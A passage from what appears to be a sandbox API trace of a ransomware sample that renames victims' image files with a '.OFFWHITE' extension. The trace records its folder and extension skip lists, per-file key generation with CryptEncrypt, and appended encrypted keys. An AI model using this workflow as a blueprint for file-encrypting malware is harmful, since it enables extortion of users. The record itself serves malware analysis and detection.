hTemplateFile=0x0) returned 0x218 [0135.403] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=60382) returned 1 [0135.403] GetProcessHeap () returned 0x500000 [0135.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.403] GetProcessHeap () returned 0x500000 [0135.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.403] GetProcessHeap () returned 0x500000 [0135.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.403] GetProcessHeap () returned 0x500000 [0135.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.403] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.403] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.403] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.404] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.404] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.404] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.404] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xebde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.404] SetLastError (dwErrCode=0x0) [0135.404] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.406] GetLastError () returned 0x0 [0135.406] GetLastError () returned 0x0 [0135.406] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xecde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.406] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.407] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xedde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.407] WriteFile (in: hFile=0x218, lpBuffer=0x531a20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a20*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.407] GetProcessHeap () returned 0x500000 [0135.407] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xebde) returned 0x55c7c8 [0135.407] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.407] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0xebde, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0xebde, lpOverlapped=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.412] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0xebde, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0xebde, lpOverlapped=0x0) returned 1 [0135.412] GetProcessHeap () returned 0x500000 [0135.412] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.412] CloseHandle (hObject=0x218) returned 1 [0135.414] GetProcessHeap () returned 0x500000 [0135.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.414] GetProcessHeap () returned 0x500000 [0135.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.414] GetProcessHeap () returned 0x500000 [0135.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.414] GetProcessHeap () returned 0x500000 [0135.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.414] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png" [0135.414] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png.OFFWHITE" [0135.414] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\k3rdfcvci.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\k3rdfcvci.png.offwhite")) returned 1 [0135.415] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b357b0, ftCreationTime.dwHighDateTime=0x1d5e819, ftLastAccessTime.dwLowDateTime=0x2bb68ba0, ftLastAccessTime.dwHighDateTime=0x1d5e45e, ftLastWriteTime.dwLowDateTime=0x2bb68ba0, ftLastWriteTime.dwHighDateTime=0x1d5e45e, nFileSizeHigh=0x0, nFileSizeLow=0x7e2d, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="TBK5zi94dC3.png", cAlternateFileName="TBK5ZI~1.PNG")) returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2=".") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="..") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="...") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="windows") returned -1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="$recycle.bin") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="rsa") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="ntuser.dat") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="programdata") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="appdata") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="program files") returned 1 [0135.415] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="program files (x86)") returned 1 [0135.415] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.416] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="TBK5zi94dC3.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png" [0135.416] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.416] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.416] PathFindExtensionW (pszPath="TBK5zi94dC3.png") returned=".png" [0135.416] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.416] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.416] lstrcmpiW (lpString1="TBK5zi94dC3.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.416] GetProcessHeap () returned 0x500000 [0135.416] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a30 [0135.416] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\tbk5zi94dc3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.417] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=32301) returned 1 [0135.417] GetProcessHeap () returned 0x500000 [0135.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.417] GetProcessHeap () returned 0x500000 [0135.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.417] GetProcessHeap () returned 0x500000 [0135.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.417] GetProcessHeap () returned 0x500000 [0135.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.417] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.417] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.417] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.417] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.417] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.417] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.417] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.417] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.417] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.418] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.418] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.418] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.418] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7e2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.418] SetLastError (dwErrCode=0x0) [0135.418] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.420] GetLastError () returned 0x0 [0135.420] GetLastError () returned 0x0 [0135.420] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7f2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.420] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.421] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x802d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.421] WriteFile (in: hFile=0x218, lpBuffer=0x531a30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a30*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.421] GetProcessHeap () returned 0x500000 [0135.421] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7e2d) returned 0x55c7c8 [0135.421] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.421] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x7e2d, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x7e2d, lpOverlapped=0x0) returned 1 [0135.424] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.424] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x7e2d, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x7e2d, lpOverlapped=0x0) returned 1 [0135.424] GetProcessHeap () returned 0x500000 [0135.424] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.424] CloseHandle (hObject=0x218) returned 1 [0135.431] GetProcessHeap () returned 0x500000 [0135.431] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.431] GetProcessHeap () returned 0x500000 [0135.431] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.431] GetProcessHeap () returned 0x500000 [0135.431] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.431] GetProcessHeap () returned 0x500000 [0135.431] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.431] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png" [0135.431] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png.OFFWHITE" [0135.431] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\tbk5zi94dc3.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\TBK5zi94dC3.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\tbk5zi94dc3.png.offwhite")) returned 1 [0135.432] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7278ea40, ftCreationTime.dwHighDateTime=0x1d5dc7c, ftLastAccessTime.dwLowDateTime=0x5b9db100, ftLastAccessTime.dwHighDateTime=0x1d5e2a5, ftLastWriteTime.dwLowDateTime=0x5b9db100, ftLastWriteTime.dwHighDateTime=0x1d5e2a5, nFileSizeHigh=0x0, nFileSizeLow=0x16dd3, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="wBUhA1LzN6CL.bmp", cAlternateFileName="WBUHA1~1.BMP")) returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2=".") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="..") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="...") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="windows") returned -1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="$recycle.bin") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="rsa") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="ntuser.dat") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="programdata") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="appdata") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="program files") returned 1 [0135.432] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="program files (x86)") returned 1 [0135.433] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.433] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="wBUhA1LzN6CL.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp" [0135.433] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.433] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.433] PathFindExtensionW (pszPath="wBUhA1LzN6CL.bmp") returned=".bmp" [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.433] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.433] lstrcmpiW (lpString1="wBUhA1LzN6CL.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.433] GetProcessHeap () returned 0x500000 [0135.433] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a40 [0135.433] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\wbuha1lzn6cl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.434] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=93651) returned 1 [0135.434] GetProcessHeap () returned 0x500000 [0135.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.434] GetProcessHeap () returned 0x500000 [0135.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.434] GetProcessHeap () returned 0x500000 [0135.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.434] GetProcessHeap () returned 0x500000 [0135.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.434] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.434] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.434] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.434] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.435] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x16dd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.435] SetLastError (dwErrCode=0x0) [0135.435] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.438] GetLastError () returned 0x0 [0135.438] GetLastError () returned 0x0 [0135.438] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x16ed3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.438] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, 